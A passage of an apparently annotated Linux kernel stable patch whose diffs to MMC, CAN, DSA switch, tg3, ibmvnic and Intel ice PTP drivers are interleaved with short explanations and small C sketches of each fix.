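With the new fields, a fixup entry can be pinned to a manufacturing date, defaulting to wildcards so existing entries are unaffected. A sketch of the match logic mmc_fixup_device() now applies, with simplified structs and the illustrative values from the Kingston quirk above:

#include <stdbool.h>
#include <stdio.h>

#define CID_YEAR_ANY  ((unsigned short)-1)
#define CID_MONTH_ANY ((unsigned char)-1)

struct fixup { unsigned short year; unsigned char month; };
struct cid   { unsigned short year; unsigned char month; };

static bool fixup_matches(const struct fixup *f, const struct cid *c)
{
	if (f->year != CID_YEAR_ANY && f->year != c->year)
		return false;
	if (f->month != CID_MONTH_ANY && f->month != c->month)
		return false;
	return true;
}

int main(void)
{
	struct fixup kingston = { .year = 2019, .month = 11 };
	struct cid old_card = { 2019, 11 }, new_card = { 2023, 5 };

	printf("old card matches: %d\n", fixup_matches(&kingston, &old_card)); /* 1 */
	printf("new card matches: %d\n", fixup_matches(&kingston, &new_card)); /* 0 */
	return 0;
}
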
+diff --git a/drivers/mmc/core/sd.c b/drivers/mmc/core/sd.c
+index 72b664ed90cf6..246ce027ae0aa 100644
+--- a/drivers/mmc/core/sd.c
++++ b/drivers/mmc/core/sd.c
+@@ -1170,7 +1170,7 @@ static int sd_parse_ext_reg_perf(struct mmc_card *card, u8 fno, u8 page,
+ 		card->ext_perf.feature_support |= SD_EXT_PERF_HOST_MAINT;
+ 
+ 	/* Cache support at bit 0. */
+-	if (reg_buf[4] & BIT(0))
++	if ((reg_buf[4] & BIT(0)) && !mmc_card_broken_sd_cache(card))
+ 		card->ext_perf.feature_support |= SD_EXT_PERF_CACHE;
+ 
+ 	/* Command queue support indicated via queue depth bits (0 to 4). */
+diff --git a/drivers/mmc/host/mmci.c b/drivers/mmc/host/mmci.c
+index 1c326e4307f4a..9728b093f4dba 100644
+--- a/drivers/mmc/host/mmci.c
++++ b/drivers/mmc/host/mmci.c
+@@ -2456,6 +2456,7 @@ static struct amba_driver mmci_driver = {
+ 	.drv		= {
+ 		.name	= DRIVER_NAME,
+ 		.pm	= &mmci_dev_pm_ops,
++		.probe_type = PROBE_PREFER_ASYNCHRONOUS,
+ 	},
+ 	.probe		= mmci_probe,
+ 	.remove		= mmci_remove,
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 425efb3fba048..1a0d4dc24717c 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -2685,7 +2685,7 @@ static int msdc_drv_probe(struct platform_device *pdev)
+ 
+ 	/* Support for SDIO eint irq ? */
+ 	if ((mmc->pm_caps & MMC_PM_WAKE_SDIO_IRQ) && (mmc->pm_caps & MMC_PM_KEEP_POWER)) {
+-		host->eint_irq = platform_get_irq_byname(pdev, "sdio_wakeup");
++		host->eint_irq = platform_get_irq_byname_optional(pdev, "sdio_wakeup");
+ 		if (host->eint_irq > 0) {
+ 			host->pins_eint = pinctrl_lookup_state(host->pinctrl, "state_eint");
+ 			if (IS_ERR(host->pins_eint)) {
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index 632341911b6e7..ad73d528a1bd4 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -1181,6 +1181,8 @@ static void sdhci_prepare_data(struct sdhci_host *host, struct mmc_command *cmd)
+ 		}
+ 	}
+ 
++	sdhci_config_dma(host);
++
+ 	if (host->flags & SDHCI_REQ_USE_DMA) {
+ 		int sg_cnt = sdhci_pre_dma_transfer(host, data, COOKIE_MAPPED);
+ 
+@@ -1200,8 +1202,6 @@ static void sdhci_prepare_data(struct sdhci_host *host, struct mmc_command *cmd)
+ 		}
+ 	}
+ 
+-	sdhci_config_dma(host);
+-
+ 	if (!(host->flags & SDHCI_REQ_USE_DMA)) {
+ 		int flags;
+ 
+diff --git a/drivers/mtd/parsers/Kconfig b/drivers/mtd/parsers/Kconfig
+index aaa06050c9bc9..c8f628a0689d7 100644
+--- a/drivers/mtd/parsers/Kconfig
++++ b/drivers/mtd/parsers/Kconfig
+@@ -22,7 +22,7 @@ config MTD_BCM63XX_PARTS
+ 
+ config MTD_BRCM_U_BOOT
+ 	tristate "Broadcom's U-Boot partition parser"
+-	depends on ARCH_BCM4908 || COMPILE_TEST
++	depends on ARCH_BCMBCA || COMPILE_TEST
+ 	help
+ 	  Broadcom uses a custom way of storing U-Boot environment variables.
+ 	  They are placed inside the U-Boot partition itself at an unspecified offset.
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index 9ed80f7106515..91d84df91123b 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -4168,7 +4168,7 @@ u32 bond_xmit_hash(struct bonding *bond, struct sk_buff *skb)
+ 		return skb->hash;
+ 
+ 	return __bond_xmit_hash(bond, skb, skb->data, skb->protocol,
+-				skb_mac_offset(skb), skb_network_offset(skb),
++				0, skb_network_offset(skb),
+ 				skb_headlen(skb));
+ }
+ 
+diff --git a/drivers/net/can/kvaser_pciefd.c b/drivers/net/can/kvaser_pciefd.c
+index 956a4a57396f9..74a47244f1291 100644
+--- a/drivers/net/can/kvaser_pciefd.c
++++ b/drivers/net/can/kvaser_pciefd.c
+@@ -538,6 +538,13 @@ static int kvaser_pciefd_set_tx_irq(struct kvaser_pciefd_can *can)
+ 	return 0;
+ }
+ 
++static inline void kvaser_pciefd_set_skb_timestamp(const struct kvaser_pciefd *pcie,
++						   struct sk_buff *skb, u64 timestamp)
++{
++	skb_hwtstamps(skb)->hwtstamp =
++		ns_to_ktime(div_u64(timestamp * 1000, pcie->freq_to_ticks_div));
++}
++
+ static void kvaser_pciefd_setup_controller(struct kvaser_pciefd_can *can)
+ {
+ 	u32 mode;
+@@ -1171,7 +1178,6 @@ static int kvaser_pciefd_handle_data_packet(struct kvaser_pciefd *pcie,
+ 	struct canfd_frame *cf;
+ 	struct can_priv *priv;
+ 	struct net_device_stats *stats;
+-	struct skb_shared_hwtstamps *shhwtstamps;
+ 	u8 ch_id = (p->header[1] >> KVASER_PCIEFD_PACKET_CHID_SHIFT) & 0x7;
+ 
+ 	if (ch_id >= pcie->nr_channels)
+@@ -1214,12 +1220,7 @@ static int kvaser_pciefd_handle_data_packet(struct kvaser_pciefd *pcie,
+ 		stats->rx_bytes += cf->len;
+ 	}
+ 	stats->rx_packets++;
+-
+-	shhwtstamps = skb_hwtstamps(skb);
+-
+-	shhwtstamps->hwtstamp =
+-		ns_to_ktime(div_u64(p->timestamp * 1000,
+-				    pcie->freq_to_ticks_div));
++	kvaser_pciefd_set_skb_timestamp(pcie, skb, p->timestamp);
+ 
+ 	return netif_rx(skb);
+ }
+@@ -1282,7 +1283,6 @@ static int kvaser_pciefd_rx_error_frame(struct kvaser_pciefd_can *can,
+ 	struct net_device *ndev = can->can.dev;
+ 	struct sk_buff *skb;
+ 	struct can_frame *cf = NULL;
+-	struct skb_shared_hwtstamps *shhwtstamps;
+ 	struct net_device_stats *stats = &ndev->stats;
+ 
+ 	old_state = can->can.state;
+@@ -1323,10 +1323,7 @@ static int kvaser_pciefd_rx_error_frame(struct kvaser_pciefd_can *can,
+ 		return -ENOMEM;
+ 	}
+ 
+-	shhwtstamps = skb_hwtstamps(skb);
+-	shhwtstamps->hwtstamp =
+-		ns_to_ktime(div_u64(p->timestamp * 1000,
+-				    can->kv_pcie->freq_to_ticks_div));
++	kvaser_pciefd_set_skb_timestamp(can->kv_pcie, skb, p->timestamp);
+ 	cf->can_id |= CAN_ERR_BUSERROR | CAN_ERR_CNT;
+ 
+ 	cf->data[6] = bec.txerr;
+@@ -1374,7 +1371,6 @@ static int kvaser_pciefd_handle_status_resp(struct kvaser_pciefd_can *can,
+ 		struct net_device *ndev = can->can.dev;
+ 		struct sk_buff *skb;
+ 		struct can_frame *cf;
+-		struct skb_shared_hwtstamps *shhwtstamps;
+ 
+ 		skb = alloc_can_err_skb(ndev, &cf);
+ 		if (!skb) {
+@@ -1394,10 +1390,7 @@ static int kvaser_pciefd_handle_status_resp(struct kvaser_pciefd_can *can,
+ 			cf->can_id |= CAN_ERR_RESTARTED;
+ 		}
+ 
+-		shhwtstamps = skb_hwtstamps(skb);
+-		shhwtstamps->hwtstamp =
+-			ns_to_ktime(div_u64(p->timestamp * 1000,
+-					    can->kv_pcie->freq_to_ticks_div));
++		kvaser_pciefd_set_skb_timestamp(can->kv_pcie, skb, p->timestamp);
+ 
+ 		cf->data[6] = bec.txerr;
+ 		cf->data[7] = bec.rxerr;
+@@ -1526,6 +1519,7 @@ static void kvaser_pciefd_handle_nack_packet(struct kvaser_pciefd_can *can,
+ 
+ 	if (skb) {
+ 		cf->can_id |= CAN_ERR_BUSERROR;
++		kvaser_pciefd_set_skb_timestamp(can->kv_pcie, skb, p->timestamp);
+ 		netif_rx(skb);
+ 	} else {
+ 		stats->rx_dropped++;
+@@ -1557,8 +1551,15 @@ static int kvaser_pciefd_handle_ack_packet(struct kvaser_pciefd *pcie,
+ 		netdev_dbg(can->can.dev, "Packet was flushed\n");
+ 	} else {
+ 		int echo_idx = p->header[0] & KVASER_PCIEFD_PACKET_SEQ_MSK;
+-		int dlc = can_get_echo_skb(can->can.dev, echo_idx, NULL);
+-		u8 count = ioread32(can->reg_base +
++		int dlc;
++		u8 count;
++		struct sk_buff *skb;
++
++		skb = can->can.echo_skb[echo_idx];
++		if (skb)
++			kvaser_pciefd_set_skb_timestamp(pcie, skb, p->timestamp);
++		dlc = can_get_echo_skb(can->can.dev, echo_idx, NULL);
++		count = ioread32(can->reg_base +
+ 				    KVASER_PCIEFD_KCAN_TX_NPACKETS_REG) & 0xff;
+ 
+ 		if (count < KVASER_PCIEFD_CAN_TX_MAX_COUNT &&
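
The new kvaser_pciefd_set_skb_timestamp() helper, now also used on the ACK and NACK paths, centralizes one conversion: a raw packet timestamp in controller ticks becomes ticks * 1000 / freq_to_ticks_div nanoseconds. A stand-alone version with an assumed divisor; the real value is derived from the controller clock:

#include <stdint.h>
#include <stdio.h>

static uint64_t ticks_to_ns(uint64_t ticks, uint32_t freq_to_ticks_div)
{
	return ticks * 1000ULL / freq_to_ticks_div; /* div_u64() in-kernel */
}

int main(void)
{
	/* e.g. an 80 MHz timestamp clock -> div = 80, so 1 tick = 12.5 ns */
	printf("%llu ns\n", (unsigned long long)ticks_to_ns(1600, 80)); /* 20000 */
	return 0;
}
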
+diff --git a/drivers/net/dsa/ocelot/felix.c b/drivers/net/dsa/ocelot/felix.c
+index dd3a18cc89dd2..4faabc4364aa7 100644
+--- a/drivers/net/dsa/ocelot/felix.c
++++ b/drivers/net/dsa/ocelot/felix.c
+@@ -1705,6 +1705,18 @@ static bool felix_rxtstamp(struct dsa_switch *ds, int port,
+ 	u32 tstamp_hi;
+ 	u64 tstamp;
+ 
++	switch (type & PTP_CLASS_PMASK) {
++	case PTP_CLASS_L2:
++		if (!(ocelot->ports[port]->trap_proto & OCELOT_PROTO_PTP_L2))
++			return false;
++		break;
++	case PTP_CLASS_IPV4:
++	case PTP_CLASS_IPV6:
++		if (!(ocelot->ports[port]->trap_proto & OCELOT_PROTO_PTP_L4))
++			return false;
++		break;
++	}
++
+ 	/* If the "no XTR IRQ" workaround is in use, tell DSA to defer this skb
+ 	 * for RX timestamping. Then free it, and poll for its copy through
+ 	 * MMIO in the CPU port module, and inject that into the stack from
+diff --git a/drivers/net/dsa/sja1105/sja1105.h b/drivers/net/dsa/sja1105/sja1105.h
+index 9ba2ec2b966d9..fb3cd4c78faa8 100644
+--- a/drivers/net/dsa/sja1105/sja1105.h
++++ b/drivers/net/dsa/sja1105/sja1105.h
+@@ -250,6 +250,7 @@ struct sja1105_private {
+ 	unsigned long ucast_egress_floods;
+ 	unsigned long bcast_egress_floods;
+ 	unsigned long hwts_tx_en;
++	unsigned long hwts_rx_en;
+ 	const struct sja1105_info *info;
+ 	size_t max_xfer_len;
+ 	struct spi_device *spidev;
+@@ -287,7 +288,6 @@ struct sja1105_spi_message {
+ /* From sja1105_main.c */
+ enum sja1105_reset_reason {
+ 	SJA1105_VLAN_FILTERING = 0,
+-	SJA1105_RX_HWTSTAMPING,
+ 	SJA1105_AGEING_TIME,
+ 	SJA1105_SCHEDULING,
+ 	SJA1105_BEST_EFFORT_POLICING,
+diff --git a/drivers/net/dsa/sja1105/sja1105_main.c b/drivers/net/dsa/sja1105/sja1105_main.c
+index b70dcf32a26dc..947e8f7c09880 100644
+--- a/drivers/net/dsa/sja1105/sja1105_main.c
++++ b/drivers/net/dsa/sja1105/sja1105_main.c
+@@ -866,12 +866,12 @@ static int sja1105_init_general_params(struct sja1105_private *priv)
+ 		.hostprio = 7,
+ 		.mac_fltres1 = SJA1105_LINKLOCAL_FILTER_A,
+ 		.mac_flt1    = SJA1105_LINKLOCAL_FILTER_A_MASK,
+-		.incl_srcpt1 = false,
+-		.send_meta1  = false,
++		.incl_srcpt1 = true,
++		.send_meta1  = true,
+ 		.mac_fltres0 = SJA1105_LINKLOCAL_FILTER_B,
+ 		.mac_flt0    = SJA1105_LINKLOCAL_FILTER_B_MASK,
+-		.incl_srcpt0 = false,
+-		.send_meta0  = false,
++		.incl_srcpt0 = true,
++		.send_meta0  = true,
+ 		/* Default to an invalid value */
+ 		.mirr_port = priv->ds->num_ports,
+ 		/* No TTEthernet */
+@@ -2215,7 +2215,6 @@ static int sja1105_reload_cbs(struct sja1105_private *priv)
+ 
+ static const char * const sja1105_reset_reasons[] = {
+ 	[SJA1105_VLAN_FILTERING] = "VLAN filtering",
+-	[SJA1105_RX_HWTSTAMPING] = "RX timestamping",
+ 	[SJA1105_AGEING_TIME] = "Ageing time",
+ 	[SJA1105_SCHEDULING] = "Time-aware scheduling",
+ 	[SJA1105_BEST_EFFORT_POLICING] = "Best-effort policing",
+@@ -2407,11 +2406,6 @@ int sja1105_vlan_filtering(struct dsa_switch *ds, int port, bool enabled,
+ 	general_params->tpid = tpid;
+ 	/* EtherType used to identify outer tagged (S-tag) VLAN traffic */
+ 	general_params->tpid2 = tpid2;
+-	/* When VLAN filtering is on, we need to at least be able to
+-	 * decode management traffic through the "backup plan".
+-	 */
+-	general_params->incl_srcpt1 = enabled;
+-	general_params->incl_srcpt0 = enabled;
+ 
+ 	for (port = 0; port < ds->num_ports; port++) {
+ 		if (dsa_is_unused_port(ds, port))
+diff --git a/drivers/net/dsa/sja1105/sja1105_ptp.c b/drivers/net/dsa/sja1105/sja1105_ptp.c
+index 30fb2cc40164b..a7d41e7813982 100644
+--- a/drivers/net/dsa/sja1105/sja1105_ptp.c
++++ b/drivers/net/dsa/sja1105/sja1105_ptp.c
+@@ -58,35 +58,10 @@ enum sja1105_ptp_clk_mode {
+ #define ptp_data_to_sja1105(d) \
+ 		container_of((d), struct sja1105_private, ptp_data)
+ 
+-/* Must be called only while the RX timestamping state of the tagger
+- * is turned off
+- */
+-static int sja1105_change_rxtstamping(struct sja1105_private *priv,
+-				      bool on)
+-{
+-	struct sja1105_ptp_data *ptp_data = &priv->ptp_data;
+-	struct sja1105_general_params_entry *general_params;
+-	struct sja1105_table *table;
+-
+-	table = &priv->static_config.tables[BLK_IDX_GENERAL_PARAMS];
+-	general_params = table->entries;
+-	general_params->send_meta1 = on;
+-	general_params->send_meta0 = on;
+-
+-	ptp_cancel_worker_sync(ptp_data->clock);
+-	skb_queue_purge(&ptp_data->skb_txtstamp_queue);
+-	skb_queue_purge(&ptp_data->skb_rxtstamp_queue);
+-
+-	return sja1105_static_config_reload(priv, SJA1105_RX_HWTSTAMPING);
+-}
+-
+ int sja1105_hwtstamp_set(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ {
+-	struct sja1105_tagger_data *tagger_data = sja1105_tagger_data(ds);
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct hwtstamp_config config;
+-	bool rx_on;
+-	int rc;
+ 
+ 	if (copy_from_user(&config, ifr->ifr_data, sizeof(config)))
+ 		return -EFAULT;
+@@ -104,26 +79,13 @@ int sja1105_hwtstamp_set(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ 
+ 	switch (config.rx_filter) {
+ 	case HWTSTAMP_FILTER_NONE:
+-		rx_on = false;
++		priv->hwts_rx_en &= ~BIT(port);
+ 		break;
+ 	default:
+-		rx_on = true;
++		priv->hwts_rx_en |= BIT(port);
+ 		break;
+ 	}
+ 
+-	if (rx_on != tagger_data->rxtstamp_get_state(ds)) {
+-		tagger_data->rxtstamp_set_state(ds, false);
+-
+-		rc = sja1105_change_rxtstamping(priv, rx_on);
+-		if (rc < 0) {
+-			dev_err(ds->dev,
+-				"Failed to change RX timestamping: %d\n", rc);
+-			return rc;
+-		}
+-		if (rx_on)
+-			tagger_data->rxtstamp_set_state(ds, true);
+-	}
+-
+ 	if (copy_to_user(ifr->ifr_data, &config, sizeof(config)))
+ 		return -EFAULT;
+ 	return 0;
+@@ -131,7 +93,6 @@ int sja1105_hwtstamp_set(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ 
+ int sja1105_hwtstamp_get(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ {
+-	struct sja1105_tagger_data *tagger_data = sja1105_tagger_data(ds);
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct hwtstamp_config config;
+ 
+@@ -140,7 +101,7 @@ int sja1105_hwtstamp_get(struct dsa_switch *ds, int port, struct ifreq *ifr)
+ 		config.tx_type = HWTSTAMP_TX_ON;
+ 	else
+ 		config.tx_type = HWTSTAMP_TX_OFF;
+-	if (tagger_data->rxtstamp_get_state(ds))
++	if (priv->hwts_rx_en & BIT(port))
+ 		config.rx_filter = HWTSTAMP_FILTER_PTP_V2_L2_EVENT;
+ 	else
+ 		config.rx_filter = HWTSTAMP_FILTER_NONE;
+@@ -413,11 +374,10 @@ static long sja1105_rxtstamp_work(struct ptp_clock_info *ptp)
+ 
+ bool sja1105_rxtstamp(struct dsa_switch *ds, int port, struct sk_buff *skb)
+ {
+-	struct sja1105_tagger_data *tagger_data = sja1105_tagger_data(ds);
+ 	struct sja1105_private *priv = ds->priv;
+ 	struct sja1105_ptp_data *ptp_data = &priv->ptp_data;
+ 
+-	if (!tagger_data->rxtstamp_get_state(ds))
++	if (!(priv->hwts_rx_en & BIT(port)))
+ 		return false;
+ 
+ 	/* We need to read the full PTP clock to reconstruct the Rx
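
The sja1105 side of this series replaces tagger-level RX timestamp state with a per-port bit in priv->hwts_rx_en, so toggling timestamping no longer requires a switch reset. The bookkeeping itself is plain bitmask arithmetic; a user-space sketch:

#include <stdbool.h>
#include <stdio.h>

static unsigned long hwts_rx_en;

static void port_rxtstamp_set(int port, bool on)
{
	if (on)
		hwts_rx_en |= 1UL << port;
	else
		hwts_rx_en &= ~(1UL << port);
}

static bool port_rxtstamp_get(int port)
{
	return hwts_rx_en & (1UL << port);
}

int main(void)
{
	port_rxtstamp_set(2, true);
	printf("port 2: %d, port 3: %d\n",
	       port_rxtstamp_get(2), port_rxtstamp_get(3)); /* 1, 0 */
	return 0;
}
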
+diff --git a/drivers/net/dsa/vitesse-vsc73xx-core.c b/drivers/net/dsa/vitesse-vsc73xx-core.c
+index ae55167ce0a6f..ef1a4a7c47b23 100644
+--- a/drivers/net/dsa/vitesse-vsc73xx-core.c
++++ b/drivers/net/dsa/vitesse-vsc73xx-core.c
+@@ -1025,17 +1025,17 @@ static int vsc73xx_change_mtu(struct dsa_switch *ds, int port, int new_mtu)
+ 	struct vsc73xx *vsc = ds->priv;
+ 
+ 	return vsc73xx_write(vsc, VSC73XX_BLOCK_MAC, port,
+-			     VSC73XX_MAXLEN, new_mtu);
++			     VSC73XX_MAXLEN, new_mtu + ETH_HLEN + ETH_FCS_LEN);
+ }
+ 
+ /* According to application note "VSC7398 Jumbo Frames", setting
+- * up the MTU to 9.6 KB does not affect the performance on standard
++ * up the frame size to 9.6 KB does not affect the performance on standard
+  * frames. It is clear from the application note that
+  * "9.6 kilobytes" == 9600 bytes.
+  */
+ static int vsc73xx_get_max_mtu(struct dsa_switch *ds, int port)
+ {
+-	return 9600;
++	return 9600 - ETH_HLEN - ETH_FCS_LEN;
+ }
+ 
+ static const struct dsa_switch_ops vsc73xx_ds_ops = {
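
The vsc73xx fix is a units correction: MTU excludes the Ethernet header and FCS, while VSC73XX_MAXLEN holds the full frame length, so the driver must add ETH_HLEN + ETH_FCS_LEN when writing the register and subtract them when reporting the 9600-byte hardware limit. The numbers worked through:

#include <stdio.h>

#define ETH_HLEN    14  /* Ethernet header */
#define ETH_FCS_LEN  4  /* frame checksum */

int main(void)
{
	int new_mtu = 1500;

	printf("MAXLEN written: %d\n", new_mtu + ETH_HLEN + ETH_FCS_LEN); /* 1518 */
	printf("max MTU advertised: %d\n", 9600 - ETH_HLEN - ETH_FCS_LEN); /* 9582 */
	return 0;
}
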
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index af9ea5e4371b3..9609041016776 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -224,6 +224,7 @@ MODULE_AUTHOR("David S. Miller (davem@redhat.com) and Jeff Garzik (jgarzik@pobox
+ MODULE_DESCRIPTION("Broadcom Tigon3 ethernet driver");
+ MODULE_LICENSE("GPL");
+ MODULE_FIRMWARE(FIRMWARE_TG3);
++MODULE_FIRMWARE(FIRMWARE_TG357766);
+ MODULE_FIRMWARE(FIRMWARE_TG3TSO);
+ MODULE_FIRMWARE(FIRMWARE_TG3TSO5);
+ 
+diff --git a/drivers/net/ethernet/ibm/ibmvnic.c b/drivers/net/ethernet/ibm/ibmvnic.c
+index 9282381a438fe..bc97f24b08270 100644
+--- a/drivers/net/ethernet/ibm/ibmvnic.c
++++ b/drivers/net/ethernet/ibm/ibmvnic.c
+@@ -1625,7 +1625,14 @@ static int __ibmvnic_open(struct net_device *netdev)
+ 		if (prev_state == VNIC_CLOSED)
+ 			enable_irq(adapter->tx_scrq[i]->irq);
+ 		enable_scrq_irq(adapter, adapter->tx_scrq[i]);
+-		netdev_tx_reset_queue(netdev_get_tx_queue(netdev, i));
++		/* netdev_tx_reset_queue will reset dql stats. During NON_FATAL
++		 * resets, don't reset the stats because there could be batched
++		 * skbs waiting to be sent. If we reset dql stats, we risk
++		 * num_completed being greater than num_queued. This will cause
++		 * a BUG_ON in dql_completed().
++		 */
++		if (adapter->reset_reason != VNIC_RESET_NON_FATAL)
++			netdev_tx_reset_queue(netdev_get_tx_queue(netdev, i));
+ 	}
+ 
+ 	rc = set_link_state(adapter, IBMVNIC_LOGICAL_LNK_UP);
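
The ibmvnic comment describes a counter invariant: dynamic queue limits require num_completed <= num_queued at all times, and zeroing the counters while skbs are still in flight breaks it. The failure in miniature, with plain integers standing in for the dql fields:

#include <stdio.h>

int main(void)
{
	unsigned int num_queued = 3, num_completed = 2;

	num_queued = num_completed = 0; /* netdev_tx_reset_queue() on reset */
	num_completed += 1;             /* in-flight skb completes afterwards */

	if (num_completed > num_queued)
		printf("dql invariant broken: %u > %u -> BUG_ON in dql_completed()\n",
		       num_completed, num_queued);
	return 0;
}
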
+diff --git a/drivers/net/ethernet/intel/ice/ice.h b/drivers/net/ethernet/intel/ice/ice.h
+index ca6b877fdde81..f2be383d97df5 100644
+--- a/drivers/net/ethernet/intel/ice/ice.h
++++ b/drivers/net/ethernet/intel/ice/ice.h
+@@ -491,6 +491,12 @@ enum ice_pf_flags {
+ 	ICE_PF_FLAGS_NBITS		/* must be last */
+ };
+ 
++enum ice_misc_thread_tasks {
++	ICE_MISC_THREAD_EXTTS_EVENT,
++	ICE_MISC_THREAD_TX_TSTAMP,
++	ICE_MISC_THREAD_NBITS		/* must be last */
++};
++
+ struct ice_switchdev_info {
+ 	struct ice_vsi *control_vsi;
+ 	struct ice_vsi *uplink_vsi;
+@@ -532,6 +538,7 @@ struct ice_pf {
+ 	DECLARE_BITMAP(features, ICE_F_MAX);
+ 	DECLARE_BITMAP(state, ICE_STATE_NBITS);
+ 	DECLARE_BITMAP(flags, ICE_PF_FLAGS_NBITS);
++	DECLARE_BITMAP(misc_thread, ICE_MISC_THREAD_NBITS);
+ 	unsigned long *avail_txqs;	/* bitmap to track PF Tx queue usage */
+ 	unsigned long *avail_rxqs;	/* bitmap to track PF Rx queue usage */
+ 	unsigned long serv_tmr_period;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 4095fe40dfc9b..7a5ec3ce3407a 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -3116,20 +3116,28 @@ static irqreturn_t ice_misc_intr(int __always_unused irq, void *data)
+ 
+ 	if (oicr & PFINT_OICR_TSYN_TX_M) {
+ 		ena_mask &= ~PFINT_OICR_TSYN_TX_M;
+-		if (!hw->reset_ongoing)
++		if (!hw->reset_ongoing) {
++			set_bit(ICE_MISC_THREAD_TX_TSTAMP, pf->misc_thread);
+ 			ret = IRQ_WAKE_THREAD;
++		}
+ 	}
+ 
+ 	if (oicr & PFINT_OICR_TSYN_EVNT_M) {
+ 		u8 tmr_idx = hw->func_caps.ts_func_info.tmr_index_owned;
+ 		u32 gltsyn_stat = rd32(hw, GLTSYN_STAT(tmr_idx));
+ 
+-		/* Save EVENTs from GTSYN register */
+-		pf->ptp.ext_ts_irq |= gltsyn_stat & (GLTSYN_STAT_EVENT0_M |
+-						     GLTSYN_STAT_EVENT1_M |
+-						     GLTSYN_STAT_EVENT2_M);
+ 		ena_mask &= ~PFINT_OICR_TSYN_EVNT_M;
+-		kthread_queue_work(pf->ptp.kworker, &pf->ptp.extts_work);
++
++		if (hw->func_caps.ts_func_info.src_tmr_owned) {
++			/* Save EVENTs from GLTSYN register */
++			pf->ptp.ext_ts_irq |= gltsyn_stat &
++					      (GLTSYN_STAT_EVENT0_M |
++					       GLTSYN_STAT_EVENT1_M |
++					       GLTSYN_STAT_EVENT2_M);
++
++			set_bit(ICE_MISC_THREAD_EXTTS_EVENT, pf->misc_thread);
++			ret = IRQ_WAKE_THREAD;
++		}
+ 	}
+ 
+ #define ICE_AUX_CRIT_ERR (PFINT_OICR_PE_CRITERR_M | PFINT_OICR_HMC_ERR_M | PFINT_OICR_PE_PUSH_M)
+@@ -3173,8 +3181,13 @@ static irqreturn_t ice_misc_intr_thread_fn(int __always_unused irq, void *data)
+ 	if (ice_is_reset_in_progress(pf->state))
+ 		return IRQ_HANDLED;
+ 
+-	while (!ice_ptp_process_ts(pf))
+-		usleep_range(50, 100);
++	if (test_and_clear_bit(ICE_MISC_THREAD_EXTTS_EVENT, pf->misc_thread))
++		ice_ptp_extts_event(pf);
++
++	if (test_and_clear_bit(ICE_MISC_THREAD_TX_TSTAMP, pf->misc_thread)) {
++		while (!ice_ptp_process_ts(pf))
++			usleep_range(50, 100);
++	}
+ 
+ 	return IRQ_HANDLED;
+ }
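
The ice rework moves both PTP jobs out of the hard IRQ: the handler only records which task is pending in pf->misc_thread and returns IRQ_WAKE_THREAD, and the threaded handler drains the bits with test_and_clear_bit(). The same split, sketched with GCC atomic builtins in place of the kernel bitops:

#include <stdio.h>

enum { THREAD_EXTTS_EVENT, THREAD_TX_TSTAMP };
static unsigned long misc_thread;

static void set_pending(int bit)  /* hard IRQ side */
{
	__atomic_fetch_or(&misc_thread, 1UL << bit, __ATOMIC_SEQ_CST);
}

static int test_and_clear_pending(int bit)  /* thread side */
{
	unsigned long old = __atomic_fetch_and(&misc_thread, ~(1UL << bit),
					       __ATOMIC_SEQ_CST);
	return !!(old & (1UL << bit));
}

int main(void)
{
	set_pending(THREAD_TX_TSTAMP);
	if (test_and_clear_pending(THREAD_EXTTS_EVENT))
		printf("handle external timestamp event\n");
	if (test_and_clear_pending(THREAD_TX_TSTAMP))
		printf("process Tx timestamps\n");
	return 0;
}
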
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index a3585ede829bb..46b0063a5e128 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -1478,15 +1478,11 @@ static int ice_ptp_adjfine(struct ptp_clock_info *info, long scaled_ppm)
+ }
+ 
+ /**
+- * ice_ptp_extts_work - Workqueue task function
+- * @work: external timestamp work structure
+- *
+- * Service for PTP external clock event
++ * ice_ptp_extts_event - Process PTP external clock event
++ * @pf: Board private structure
+  */
+-static void ice_ptp_extts_work(struct kthread_work *work)
++void ice_ptp_extts_event(struct ice_pf *pf)
+ {
+-	struct ice_ptp *ptp = container_of(work, struct ice_ptp, extts_work);
+-	struct ice_pf *pf = container_of(ptp, struct ice_pf, ptp);
+ 	struct ptp_clock_event event;
+ 	struct ice_hw *hw = &pf->hw;
+ 	u8 chan, tmr_idx;
+@@ -2512,7 +2508,6 @@ void ice_ptp_prepare_for_reset(struct ice_pf *pf)
+ 	ice_ptp_cfg_timestamp(pf, false);
+ 
+ 	kthread_cancel_delayed_work_sync(&ptp->work);
+-	kthread_cancel_work_sync(&ptp->extts_work);
+ 
+ 	if (test_bit(ICE_PFR_REQ, pf->state))
+ 		return;
+@@ -2610,7 +2605,6 @@ static int ice_ptp_init_work(struct ice_pf *pf, struct ice_ptp *ptp)
+ 
+ 	/* Initialize work functions */
+ 	kthread_init_delayed_work(&ptp->work, ice_ptp_periodic_work);
+-	kthread_init_work(&ptp->extts_work, ice_ptp_extts_work);
+ 
+ 	/* Allocate a kworker for handling work required for the ports
+ 	 * connected to the PTP hardware clock.
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.h b/drivers/net/ethernet/intel/ice/ice_ptp.h
+index 028349295b719..e689c05bb001f 100644
